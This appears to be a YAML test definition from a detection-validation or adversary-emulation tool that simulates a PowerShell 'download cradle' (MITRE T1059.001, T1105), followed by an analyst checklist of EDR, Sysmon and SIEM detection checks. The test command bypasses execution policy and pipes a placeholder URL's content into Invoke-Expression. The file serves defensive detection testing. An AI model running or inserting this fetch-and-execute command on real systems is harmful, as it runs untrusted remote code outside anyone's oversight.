id: DLEXEC_001_powershell_iex
name: "Download and Execute — PowerShell IEX WebClient"
mitre: "T1059.001, T1105"
category: download_execute
description: >
  Downloads and executes a remote script in memory using PowerShell Net.WebClient
  and IEX (Invoke-Expression). No file is written to disk. This is the most common
  download cradle used in the wild. Replace PLACEHOLDER_URL with your hosted script URL.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-001] PowerShell IEX WebClient download cradle"

  - type: exec_powershell
    encoded: false
    command: |
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('PLACEHOLDER_URL')|iex"
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "EDR: Alert on IEX + iwr (Invoke-WebRequest) from powershell.exe?"
  - "EDR: -exec bypass flag captured in command line?"
  - "Sysmon Event ID 3: Network connection from powershell.exe to PLACEHOLDER_URL host?"
  - "Windows Event ID 4104: Script block log captured decoded content?"
  - "SIEM: powershell.exe outbound connection + IEX pattern correlatable?"
  - "Rule opportunity: powershell.exe commandline contains '-exec bypass' AND 'iex' AND 'iwr'"
  - "Rule opportunity: powershell.exe making outbound HTTP connection to non-Microsoft host"
